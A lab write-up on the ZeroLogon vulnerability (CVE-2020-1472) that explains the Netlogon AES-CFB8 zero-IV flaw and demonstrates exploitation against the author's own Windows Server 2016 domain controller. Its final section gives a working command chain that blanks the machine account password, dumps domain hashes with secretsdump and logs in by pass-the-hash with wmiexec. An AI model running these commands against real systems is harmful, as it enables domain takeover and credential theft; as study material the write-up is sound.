ZeroLogon Exploit
CVE-2020-1472, 6 Oct 2020

Introduction

CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a patch (KB4565349) fixed in August 2020. This vulnerability was discovered by secure security researcher Tom Tervoor on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8) that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC. ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.
The following diagram is the authentication handshake process of MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8.
Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number, but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256. It can easy to pass the step 4 validation. The attack details can be referenced to the Whitepaper by Tom Tervoor

Exploitation Demo

Many PoC exploits have been released (1, 2, 3, 4, 5, ... etc)

Target Environment

Host Name: FKCLAI-WIN2016 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 Domain: FKCLAI.local Logon Server: \\FKCLAI-WIN2016

Tools Setup

Using the RiskSense's ZeroLogon exploitation script with the latest updated of the impacket on this demo.
1
[email protected]:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
2
Cloning into 'zerologon'...
3
remote: Enumerating objects: 22, done.
4
remote: Counting objects: 100% (22/22), done.
5
remote: Compressing objects: 100% (15/15), done.
6
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
7
Unpacking objects: 100% (22/22), done.
8
[email protected]:~/Documents/ctf/expoit#
Copied!
Remove all impacket scripts
1
[email protected]:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
2
Reading package lists... Done
3
Building dependency tree
4
Reading state information... Done
5
The following packages were automatically installed and are no longer required:
6
automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
7
erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
8
erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
9
erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
10
erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
11
ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
12
gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
13
guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
14
keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
15
libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
16
libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
17
libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
18
libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0
19
Copied!
get the latest impacket from the https://github.com/SecureAuthCorp/impacket.git
1
[email protected]:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
2
Cloning into 'impacket'...
3
remote: Enumerating objects: 18598, done.
4
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
5
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
6
Resolving deltas: 100% (14169/14169), done.
7
Copied!
1
[email protected]:~/Documents/ctf/tools/win/impacket# python setup.py install
2
running install
3
running bdist_egg
4
running egg_info
5
creating impacket.egg-info
6
writing requirements to impacket.egg-info/requires.txt
7
writing impacket.egg-info/PKG-INFO
8
writing top-level names to impacket.egg-info/top_level.txt
9
writing dependency_links to impacket.egg-info/dependency_links.txt
10
writing manifest file 'impacket.egg-info/SOURCES.txt'
11
reading manifest file 'impacket.egg-info/SOURCES.txt'
12
reading manifest template 'MANIFEST.in'
13
warning: no files found matching 'tests' under directory 'examples'
14
warning: no files found matching '*.txt' under directory 'examples'
15
writing manife
16
..
17
..
18
..
19
... dding ldapdomaindump 0.9.1 to easy-install.pth file
20
21
Using /usr/lib/python3/dist-packages
22
Searching for ldap3==2.5.1
23
Best match: ldap3 2.5.1
24
Adding ldap3 2.5.1 to easy-install.pth file
25
26
Using /usr/lib/python3/dist-packages
27
Searching for Flask==1.1.1
28
Best match: Flask 1.1.1
29
Adding Flask 1.1.1 to easy-install.pth file
30
Installing flask script to /usr/local/bin
31
32
Using /usr/lib/python3/dist-packages
33
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
34
[email protected]:~/Documents/ctf/tools/win/impacket#
35
Copied!

Start Exploit

python3 set_empty_pw.py fkclai-win2016 192.168.1.169
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
wmiexec.py fkclai/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

mimikatz Coding

Last modified 5mo ago